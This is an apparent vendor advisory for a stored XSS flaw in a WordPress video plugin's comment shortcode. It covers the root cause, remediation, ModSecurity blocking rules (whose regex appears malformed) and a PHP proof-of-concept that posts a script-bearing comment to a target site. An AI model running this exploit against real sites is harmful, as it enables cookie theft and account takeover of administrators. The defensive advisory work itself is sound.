Atomic Edge analysis of CVE-2026-10092 (metadata-based): This vulnerability affects the Cincopa video and media plug-in plugin for WordPress up to version 1.163. It is an unauthenticated stored cross-site scripting (XSS) vulnerability that allows attackers to inject arbitrary web scripts via the [cincopa] shortcode in post comments. The CVSS score is 7.2, indicating high severity with network attack vector, low complexity, and no privileges required, but only partial impact on confidentiality and integrity.
The root cause is insufficient input sanitization and output escaping when the plugin processes the [cincopa] shortcode via a comment_text filter hook. Atomic Edge analysis infers that the plugin likely registers a filter on ‘comment_text’ that evaluates shortcodes in comments without properly escaping the shortcode attributes. The CWE-79 classification confirms this is a cross-site scripting issue. Since no code diff is available, this conclusion is based on the vulnerability description and common WordPress plugin patterns.
Exploitation is straightforward. An unauthenticated attacker can post a comment containing a malicious [cincopa] shortcode with crafted attributes, such as [cincopa param=’alert(1)’]. The plugin’s filter processes this shortcode during comment display, injecting the script into the page. The attack vector is the WordPress comment submission mechanism, which typically does not require authentication on many sites. The payload persists in the database, executing whenever a user views the comment.
Remediation requires the plugin developer to implement proper input sanitization and output escaping. Specifically, the shortcode attributes should be sanitized using functions like wp_kses() or sanitize_text_field(), and the output should be escaped using esc_attr() or esc_html() depending on context. Since no patched version exists, site administrators should disable the plugin or remove the [cincopa] shortcode support from comments until a fix is available.
Impact includes the execution of arbitrary JavaScript in the context of a logged-in user’s session. This can lead to session hijacking, defacement, phishing attacks, or theft of sensitive data like cookies and authentication tokens. Unauthenticated attackers can target any user who views the affected comment, including administrators, potentially leading to account takeover.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2026-10092 (metadata-based)
# Block XSS via [cincopa] shortcode in comment submissions
# The attack uses the WordPress comment submission endpoint, which has no specific AJAX action.
# We detect the malicious shortcode pattern in the comment content parameter.
SecRule REQUEST_URI "@streq /wp-comments-post.php"
"id:10092600,phase:2,deny,status:403,chain,msg:'CVE-2026-10092 - XSS via cincopa shortcode in comments',severity:'CRITICAL',tag:'CVE-2026-10092'"
SecRule ARGS_POST:comment "@rx [cincopa[^]]*<script"
"t:urlDecode,t:lowercase"
# Alternative rule targeting the AJAX endpoint if the plugin processes shortcode via admin-ajax.php
# This is a fallback; the primary vector is comment submission.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:10092601,phase:2,deny,status:403,chain,msg:'CVE-2026-10092 - XSS via cincopa shortcode (AJAX)',severity:'CRITICAL',tag:'CVE-2026-10092'"
SecRule ARGS_POST:action "@streq cincopa_shortcode_handler"
"chain"
SecRule ARGS_POST:shortcode "@rx [cincopa[^]]*<script"
"t:urlDecode,t:lowercase"
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-10092 - Cincopa video and media plug-in <= 1.163 - Unauthenticated Stored Cross-Site Scripting via cincopa Shortcode in Post Comments
// Configuration
$target_url = 'http://example.com'; // Change this to the target WordPress site URL
$post_id = 1; // ID of a post that allows comments
// Craft the malicious shortcode with XSS payload
// The plugin processes [cincopa] shortcode in comment text, so we inject script via attribute
$payload = '[cincopa foo="<script>alert(document.cookie)</script>"]';
// Prepare comment data (unauthenticated submission)
$comment_data = array(
'comment_post_ID' => $post_id,
'comment_author' => 'Attacker',
'comment_author_email' => 'attacker@example.com',
'comment_author_url' => '',
'comment_content' => $payload,
'comment_type' => '',
'comment_parent' => 0,
);
// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-comments-post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($comment_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check for success (302 redirect typically means comment submitted)
if ($http_code == 302 || $http_code == 200) {
echo "[+] Payload submitted successfully.n";
echo "[+] Access the post to trigger XSS: " . $target_url . '/?p=' . $post_id . "n";
} else {
echo "[!] Submission may have failed (HTTP $http_code).n";
echo "[!] Check if comments are open on the target post or if nonce/captcha is required.n";
}
// Note: This PoC assumes the target post allows unauthenticated comments and no nonce/captcha.
// If the site requires authentication, this will not work.
?>
